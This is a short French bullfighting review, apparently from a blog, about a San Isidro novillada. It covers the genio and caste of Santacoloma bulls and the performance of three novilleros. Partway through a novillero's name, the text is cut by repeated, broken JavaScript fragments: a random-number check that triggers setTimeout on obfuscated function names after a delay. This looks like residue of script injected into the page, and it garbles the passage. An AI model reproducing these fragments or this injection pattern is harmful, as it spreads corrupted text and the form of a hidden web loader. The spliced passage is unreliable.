NOVILLOS POUR QUE LES TOREROS S’ÉCRASENT

San Isidro. 3ème novillada. Eclaircissons une nouvelle fois quelques concepts : le genio est l’agressivité défensive ; la caste, l’agressivité offensive ; la caste provoque la charge, le genio la freine et l’arrête ; le genio est le signe du manso ; la caste du brave.
Les toros d’origine « Santacoloma » offrent souvent du genio avec du temple, en général ils n’agressent pas, ils se contentent de ne pas baisser la tête, ou s’arrêtent, ou sortent des différentes suertes en regardant les gradins, ennuyant public et toreros. Conclusion, s’il s’agit de sauver cette souche, les propriétaires de ces élevages devraient faire appel aux « saltillos » de Victorino ou d’Adolfo Martín. José Luis Buendía utilisait des mâles de Saltillo pour couvrir ses vaches d’origine « Santacoloma ».
Le trois novilleros, Juan Miguel, Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andro Marcos et Angel Sanchez ont montré de bonnes manières. Ce dernier possède par ailleurs le sceau de celui qui pourrait être une figura. A son premier, on lui a offert une oreille à la place d’une culbute. Le public de samedi était spécial : ceux du tendido 7 se sont tus par respect pour cet encaste, le reste c’était des invités d’abonnés qui étaient restés chez eux. Nous nous sommes ennuyés en paix.

Les commentaires sont fermés.